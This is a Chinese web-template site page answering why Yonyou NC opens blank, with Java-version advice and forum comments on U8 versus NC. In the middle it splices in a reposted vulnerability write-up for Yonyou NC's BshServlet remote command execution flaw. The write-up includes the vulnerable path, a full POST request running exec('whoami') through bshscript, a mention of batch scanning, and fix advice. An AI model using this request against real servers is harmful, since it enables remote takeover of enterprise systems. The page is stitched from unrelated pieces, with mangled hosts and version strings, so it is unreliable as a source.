网站模板库
  • 首页
  • web前端工具
    • HTML/JS转换工具
    • JS/HTML格式化工具
    • 字母/英文大小写转换工具
    • robots.txt文件生成工具
    • Js压缩/格式化工具
    • Css在线压缩工具_代码格式化
  • 关于我们
    • 免责声明
    • 联系我们
    • 广告服务
    • 服务项目
    • 关于我们
    • 网站轮播
    • 公告
    • 成都优优科技专用
    • 按行业分类
  • web学院
    • 服务器教程
    • 学习资料
      • 基础书籍
      • 交互书籍
      • 入门教程
      • 特效分类
    • 案例分享
    • web资讯
  • 网页特效
    • 图片特效
    • 导航特效
    • 滑动按钮
    • 表单特效
    • 文字特效
    • 弹窗特效
    • 其他特效
  • 织梦模板
    • 科技/电子/数码/通信
    • 文化/艺术/广告/传媒
    • 装修/设计/家居/家具
    • 基建/施工/地产/物业
    • 餐饮/酒店/旅游/票务
    • 食品/果蔬/饮料/日用
    • 服饰/珠宝/礼品/玩具
    • 摄影/婚庆/家政/生活
    • 运动/健身/体育/器材
    • 学校/教育/培训/科研
    • 美容/保健/医院/医疗
    • 金融/财税/咨询/法律
    • 政府/组织/集团/协会
    • 汽车/物流/交通/搬运
    • 机械/设备/制造/仪器
    • 化工/环保/能源/材料
    • 农业/畜牧/养殖/宠物
    • 其他模版
    • IT/软件/信息/互联网
  • 手机模板
    • 手机APP模板
    • 微信小程序模板
    • wap
  • 网站模板
    • joomla模板
    • Drupal模板
    • z-blog模板
    • EyouCms模板
    • Bootstrap模板
    • 帝国cms模板
    • CmsEasy模板
    • MetInfo模板
    • 购物商城模板
      • Shopify主题
      • PrestaShop主题
    • 后台模板
    • 纯HTML模板
    • ecshop模板
    • phpwind模板
    • pbootcms模板
    • phpcms模板
    • wordpress模板
    • discuz模板
  • 教程
    • 织梦教程
    • Discuz教程
    • WordPress教程
    • Phpcms教程
    • Phpwind教程
    • ECShop教程
    • Joomla教程
    • Drupal教程
    • zblog教程
    • EyouCMS教程
    • 帝国cms教程
    • MetInfo教程
    • CmsEasy教程
登录
当前位置:网站模板库 > web学院 > 服务器教程 > 用友NC打开后空白,设置IE、重装java,什么办法都试了,都没用,求大神
商业源码 服务器教程 2024-02-10 10:38:01

用友NC打开后空白,设置IE、重装java,什么办法都试了,都没用,求大神

用友NC打开后空白,设置IE、重装java,什么办法都试了,都没用,求大神,第1张

目前java已经更新到很新的,NC5产品基于的java是比较早的版本,请注意不要更新java版本,在java设置里面可以设置不更新,默认是自动更新。

问题解决方式:

1、卸载本机所有的java,通过360等软件彻底清除java残留后,重启电脑,直接打开浏览器登录地址,系统会自动提示下载java,该java是通过NC服务器上下载的,默认比较匹配的版本。

2、通过同事、网站、用友运维等途径,获取一个比较早的java版本,一般都会有留存。

3、通过下载服务器的客户端,安装客户端后,登录软件不会出现该问题。

3、通过用友体系,获取一个NC65版本软件的uclient,该插件是目前实施顾问比较喜欢的。该插件可以完美兼容多个不同版本的服务器登录(直接下载对应网址的服务器java)。

X友 NC 远程命令执行

一、漏洞简介

用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。

用友NC存在反序列化漏洞,攻击者通过构造特定的HTTP请求,可以在目标服务器上远程执行任意命令。(用友 NC bshservletBshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。)

二、漏洞影响

用友NC 全版本

三、漏洞复现

主页样式

漏洞url:

/servlet/~ic/bshservletBshServlet

访问执行:

exec("whoami");

详细数据包:

POST /servlet/~ic/bshservletBshServlet

host: 127001:8080

user-agent: Mozilla/50 (Windows; U; Windows NT 61; en-US) AppleWebKit/5343 (KHTML, like Gecko) Chrome/6047233 Safari/5343 SE 2X MetaSr 10

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

bshscript=exec("whoami");

简单批量一下

四、修复建议

1、用友NC为商业软件,可直接联系用友官方获得安全升级方案。

2、在官方安全补丁发布之前,建议相关企业严格限制用友NC的访问权限,禁止外部IP请求用友NC应用。

参考:

https://blogcsdnnet/weixin_45728976/article/details/106560286

http://wikipeiqitech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20bshservletBshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9Ehtmlh=%E7%94%A8%E5%8F%8B%20NC%20bshservletBshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E

往期用友漏洞:

用友GRP-u8 注入-RCE漏洞复现

注意:⚠️

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

用友U8系列,使用局域网,服务器视并发访问数量选择,一般几十个人并发的,选择很普通的服务器就行,一般采用微软server版操作系统,客户端安装软件,要求也是windows系统,对版本要求不高

用友NC系列,基于互联网,服务器建议采用小型机,数据库一般是orical,客户端因为使用浏览器访问,对操作系统没有严格要求

至于你说的域管理,是方便局域网管理的一种模式,因为ERP系统采用用户口令方式登录,对管理模式没有要求。

用友NC是用友公司开发的最新的财务软件,是U8的下一代产品,适用于大中型集团公司的财务核算,我们公司就在用,比U8的功能强大许多,也繁琐了不少,不过用习惯了,还是很不错的,不过很贵啊,连服务器带软件下来要4-5百万。

用友 漏洞 版本 服务器 客户端
DABAN RP主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
网站模板库 » 用友NC打开后空白,设置IE、重装java,什么办法都试了,都没用,求大神

商业源码 钻石

分享到:
上一篇
怎么分辨内存条是amd专用的
下一篇
魔兽世界里面PVP.PVE是什么意思?

相关推荐

为什么别人的服务器有很多节点

为什么别人的服务器有很多节点

求永久免费vps服务器(要永久的)

求永久免费vps服务器(要永久的)

个人网站想租用服务器应该多少钱?

个人网站想租用服务器应该多少钱?

我需要为公司建立一个网站有哪些费用?

我需要为公司建立一个网站有哪些费用?

0条评论

发表评论 取消回复

要发表评论,您必须先登录。

提供最优质的资源集合

立即查看 了解详情
网站模板库

主题/付费下载/查看/余额管理/自定义积分,集成支付,卡密,推广奖励等。

本站导航
  • 链接标题
友情链接
  • 链接标题
快速搜索
本站由钛宇宙强力驱动
友情链接:
    商业源码网蜀ICP备2023005044号
    网站模板库
    • 登录
    • 注册
    网站模板库
    • 首页
    • web前端工具►
      • HTML/JS转换工具
      • JS/HTML格式化工具
      • 字母/英文大小写转换工具
      • robots.txt文件生成工具
      • Js压缩/格式化工具
      • Css在线压缩工具_代码格式化
    • 关于我们►
      • 免责声明
      • 联系我们
      • 广告服务
      • 服务项目
      • 关于我们
      • 网站轮播
      • 公告
      • 成都优优科技专用
      • 按行业分类
    • web学院►
      • 服务器教程
      • 学习资料►
        • 基础书籍
        • 交互书籍
        • 入门教程
        • 特效分类
      • 案例分享
      • web资讯
    • 网页特效►
      • 图片特效
      • 导航特效
      • 滑动按钮
      • 表单特效
      • 文字特效
      • 弹窗特效
      • 其他特效
    • 织梦模板►
      • 科技/电子/数码/通信
      • 文化/艺术/广告/传媒
      • 装修/设计/家居/家具
      • 基建/施工/地产/物业
      • 餐饮/酒店/旅游/票务
      • 食品/果蔬/饮料/日用
      • 服饰/珠宝/礼品/玩具
      • 摄影/婚庆/家政/生活
      • 运动/健身/体育/器材
      • 学校/教育/培训/科研
      • 美容/保健/医院/医疗
      • 金融/财税/咨询/法律
      • 政府/组织/集团/协会
      • 汽车/物流/交通/搬运
      • 机械/设备/制造/仪器
      • 化工/环保/能源/材料
      • 农业/畜牧/养殖/宠物
      • 其他模版
      • IT/软件/信息/互联网
    • 手机模板►
      • 手机APP模板
      • 微信小程序模板
      • wap
    • 网站模板►
      • joomla模板
      • Drupal模板
      • z-blog模板
      • EyouCms模板
      • Bootstrap模板
      • 帝国cms模板
      • CmsEasy模板
      • MetInfo模板
      • 购物商城模板►
        • Shopify主题
        • PrestaShop主题
      • 后台模板
      • 纯HTML模板
      • ecshop模板
      • phpwind模板
      • pbootcms模板
      • phpcms模板
      • wordpress模板
      • discuz模板
    • 教程►
      • 织梦教程
      • Discuz教程
      • WordPress教程
      • Phpcms教程
      • Phpwind教程
      • ECShop教程
      • Joomla教程
      • Drupal教程
      • zblog教程
      • EyouCMS教程
      • 帝国cms教程
      • MetInfo教程
      • CmsEasy教程

      弹窗标题

      这是一条网站公告,可在后台开启或关闭,可自定义背景颜色,标题,内容,用户首次打开关闭后不再重复弹出,此处可使用html标签...